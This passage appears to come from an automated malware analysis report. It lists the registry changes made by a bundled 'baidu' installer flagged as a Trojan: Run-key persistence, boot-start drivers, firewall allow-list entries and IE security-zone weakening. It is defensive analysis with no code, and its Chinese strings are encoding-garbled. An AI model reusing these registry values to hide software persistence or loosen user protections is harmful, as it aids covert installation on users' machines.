[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduAn\3.0.0.3971]
"BaiduAnBugRpt.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAnBugRpt.exe:*:Enabled:百度å«士BUG上报程åºÂÂ"
The following service will be launched automatically at system boot up:
[HKLM\System\CurrentControlSet\Services\BDArKit]
"Start" = "2"
The following driver will be automatically launched by the NT Native code (IoInitSystem method):
[HKLM\System\CurrentControlSet\Services\bd0002]
"Start" = "1"
The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduAn\3.0.0.3971]
"BaiduAnSvc.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAnSvc.exe:*:Enabled:百度å«士æœÂÂ务程åºÂÂ"
The following driver will be automatically launched by the NT Native code (IoInitSystem method):
[HKLM\System\CurrentControlSet\Services\bd0001]
"Start" = "1"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduAn\3.0.0.3971]
"BaiduAnUpdate.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAnUpdate.exe:*:Enabled:百度å«士更新程åºÂÂ"
"BaiduAnSvc.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAnSvc.exe:*:Enabled:百度å«士æœÂÂ务程åºÂÂ"
"BaiduAnTray.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAnTray.exe:*:Enabled:百度å«士托盘程åºÂÂ"
The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduAn\3.0.0.3971]
"BaiduAn.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAn.exe:*:Enabled:百度å«士主程åºÂÂ"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Baidu\BaiduAn]
"RtpFlag"
[HKLM\System\CurrentControlSet\Services\bd0003]
"DeleteFlag"
[HKLM\System\CurrentControlSet\Services\bd0002]
"DeleteFlag"
[HKLM\System\CurrentControlSet\Services\bd0001]
"DeleteFlag"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"DeleteFlag"
The process %original file name%.exe:716 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 78 53 70 87 26 E8 93 7C BE 9E 3F 48 76 5E 65"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"setup.exe" = "baidu Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process BaiduSdTray.exe:2844 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 FC 50 8F 1A CD 23 78 1B 66 11 7F A4 D9 01 9C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID]
"{15DEE173-1BE9-4424-81E0-58A87076E9B1}" = "1"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Baidu\BaiduSd\2.1.0.3086]
"BaiduSdBugRpt.exe" = "百度异常报告程åºÂÂ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The process BaiduAnTray.exe:3824 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF 3D DB 36 23 4D B8 9A C9 65 30 30 E0 20 F2 01"
The process setup.exe:1056 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 EA 07 A3 20 F9 4F F9 B0 58 B4 92 4C 57 69 0E"
The process cacls.exe:1860 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 F2 12 B7 FD 64 89 B9 B7 AE BD E7 1E BF F9 32"
The process MsiExec.exe:548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 46 D1 8C 7D 67 FF 53 C9 D9 2A 62 5C 76 19 05"
The process MsiExec.exe:1968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 24 C3 48 CD 4B 0E F9 0D 18 C7 9A 77 37 68 D5"
The process BaiduAnBugRpt.exe:916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 3C 86 26 7C 1C 08 2C 01 8E 8C D5 40 04 2E F6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process BDASWDeskGuide.exe:228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 90 64 2D C6 DB FA 11 12 56 48 44 31 AE 6D 28"
The process baiduanTray.exe:3012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC 3F AC CC F2 8B DE 80 3F E4 AE 38 22 BE 7B BC"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Baidu\BaiduAn\3.0.0.3971]
"BaiduAnBugRpt.exe" = "百度å«士异常报告程åºÂÂ"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Baidu\BaiduAn]
"PAUTime" = "1800000"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process BindEx.exe:1568 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 73 0F 4B 1E C7 02 FB 9E F2 DE C5 B8 BE F6 87"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}]
The process BindEx.exe:1040 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"F1023_s_30803.exe" = "百度æÂ€毒安装程åºÂÂ"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"G1023_s_70904.exe" = "百度å«士安装程åºÂÂ"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 CC E4 19 CB 4A 8C C9 BA 1B 43 AC F1 C5 2A 84"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9227"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9319"
"SHELL32.dll,-9217"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9216"
The process setup.tmp:1976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"NoRepair" = "1"
"QuietUninstallString" = "%Program Files%\baidu\unins000.exe /SILENT"
"DisplayVersion" = "1.5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"Inno Setup: Selected Tasks" = "startup,bind1"
"Inno Setup: Icon Group" = "baidu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"MinorVersion" = "5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"Inno Setup: Deselected Tasks" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"InstallDate" = "20141106"
"DisplayName" = "baidu version 1.5"
"UninstallString" = "%Program Files%\baidu\unins000.exe"
"Inno Setup: User" = "%CurrentUserName%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\baidu]
"BindEx.exe" = "BindEx"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"Inno Setup: Language" = "english"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 27 89 69 F4 4C 37 EB 05 44 47 DD 12 31 25 4B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"Inno Setup: App Path" = "%Program Files%\baidu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"NoModify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"Inno Setup: Setup Version" = "5.5.3 (a)"
"InstallLocation" = "%Program Files%\baidu\"
"MajorVersion" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"baidu" = "%Program Files%\baidu\BindEx.exe"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process regsvr32.exe:2652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 D6 47 F1 94 FF 73 43 F8 6A 8D DE B3 72 87 EC"
[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}]
"(Default)" = "IDownloader_2"
[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\InProcServer32]
"ThreadingModel" = "Both"
[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "PSFactoryBuffer"
[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}\ProxyStubClsid32]
"(Default)" = "{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}"
[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\InProcServer32]
"(Default)" = "%Program Files%\Common Files\Baidu\BDDownload\108\bdcomproxy.dll"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "IDownloader"
[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}\NumMethods]
"(Default)" = "6"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\NumMethods]
"(Default)" = "15"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid32]
"(Default)" = "{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}"
The process regsvr32.exe:1520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\BDSWShellExt.BDSWShellExtMenu]
"(Default)" = "BDSWShellExtMenu Class"
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\TypeLib]
"(Default)" = "{70891BDB-3BE3-45A9-96B6-184ABA962091}"
[HKCR\CLSID\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}]
"(Default)" = "PSFactoryBuffer"
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}]
"AppID" = "{A8B81847-1462-4756-9D4A-F506BC5361CD}"
[HKCR\BDSWShellExt.BDSWShellExtMenu\CLSID]
"(Default)" = "{11292110-6F8D-4D56-863C-44902A1E7880}"
[HKCR\Interface\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}\NumMethods]
"(Default)" = "3"
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\ProgID]
"(Default)" = "BDSWShellExt.BDSWShellExtMenu.1"
[HKCR\CLSID\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}\InProcServer32]
"(Default)" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BDSWShellExt.dll"
"ThreadingModel" = "Both"
[HKCR\Interface\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}]
"(Default)" = "IBDSWShellExtMenu"
[HKCR\BDSWShellExt.BDSWShellExtMenu.1\CLSID]
"(Default)" = "{11292110-6F8D-4D56-863C-44902A1E7880}"
[HKCR\TypeLib\{70891BDB-3BE3-45A9-96B6-184ABA962091}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Interface\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}\ProxyStubClsid32]
"(Default)" = "{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}"
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}]
"(Default)" = "BDSWShellExtMenu Class"
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\AppID\{A8B81847-1462-4756-9D4A-F506BC5361CD}]
"(Default)" = "BDSWShellExt"
[HKCR\*\shellex\ContextMenuHandlers\ABDSWShellExt]
